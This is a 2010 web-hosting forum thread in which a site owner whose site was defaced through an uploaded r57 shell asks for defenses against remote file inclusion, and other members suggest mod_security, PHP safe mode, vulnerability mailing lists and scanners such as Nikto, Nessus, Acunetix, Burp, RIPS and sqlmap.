#1  
Old 23rd June 2010, 23:29
bernholdt bernholdt is offline
Senior Member
 
Join Date: Jun 2007
Posts: 154
Thanks: 45
Thanked 13 Times in 11 Posts
Default Security question

Hi
I experienced a defacing today on one of my sites. someone managed to get a r57 shell into my site.

I have modsecurity2, php soushin, suphp, installed as security precautions.

What else can I do to protect my self against remote file inclusion.

I am running Debian Lenny with a perfect server setup, from here

Any hints or ideas ??
__________________
www.gamebook.me

Last edited by bernholdt; 23rd June 2010 at 23:30. Reason: missing info
Reply With Quote
Sponsored Links
  #2  
Old 24th June 2010, 09:37
topdog topdog is offline
Senior Member
 
Join Date: Jan 2008
Location: South Africa
Posts: 1,352
Thanks: 0
Thanked 153 Times in 150 Posts
Default

A properly configured mod security should be able to ward of most of those attacks, you could also investigate running php in safe mode. The issue with security is that it is a moving target. Keep scanning your applications for security vulnerabilities to keep ahead of the attackers.
__________________
----
http://www.topdog.za.net - Got Linux problems ? - I can help.
http://www.baruwa.org - Try it.
Reply With Quote
  #3  
Old 24th June 2010, 19:32
bernholdt bernholdt is offline
Senior Member
 
Join Date: Jun 2007
Posts: 154
Thanks: 45
Thanked 13 Times in 11 Posts
Default

Hi Topdog

You write Keep scanning your applications for security vulnerabilities to keep ahead of the attackers can you recomend a securityscanner wich i can use to find any holes in this particular script ??
__________________
www.gamebook.me
Reply With Quote
  #4  
Old 24th June 2010, 19:37
topdog topdog is offline
Senior Member
 
Join Date: Jan 2008
Location: South Africa
Posts: 1,352
Thanks: 0
Thanked 153 Times in 150 Posts
Default

Scanning is not just about using automated tools, but good examples are http://www.cirt.net/nikto2 and nessus with the commercial feed.

You need to subscribe to security vulnerability lists as well, and also do your own application auditing to check applications for XSS, CSRF and other kinds of web vulnerabilities.
__________________
----
http://www.topdog.za.net - Got Linux problems ? - I can help.
http://www.baruwa.org - Try it.
Reply With Quote
  #5  
Old 25th June 2010, 09:57
Ben Ben is offline
Moderator
 
Join Date: Jul 2006
Posts: 1,029
Thanks: 7
Thanked 62 Times in 56 Posts
Default

for application scanning you won't be that good with using nessus or nikto, eventhough they can help you as a start.
it's like doing app pentests, where you have either the choice of doing some kind of black box testing, with automated support (e.g. with acunetix or similar, acunetix for at least detecting xss and crawling is free, you could combine this with other free tools like burp that can help to find more, when letting acunetix crawl through the page) and manual test versus (manual / automated) code review. for php software you could try "rips". I did not use it yet, but the description sounded pretty interesting. Sqlmap for e.g. is interesting for checking sql injections... you will find more tools when googling around for the above, owasp or webappsec (and their mailinglist archives) are a good ressourcepool as well.
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Unable to install ISPConfig bdonecker Installation/Configuration 21 26th May 2009 08:20
Security question about port 81 nandelbosc General 4 18th April 2009 00:31
mysql security question clark61 General 1 10th April 2009 10:12
security question kidalabama Installation/Configuration 5 8th October 2008 12:12
General Security Question mphayesuk General 4 1st September 2008 11:54


All times are GMT +2. The time now is 15:46.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.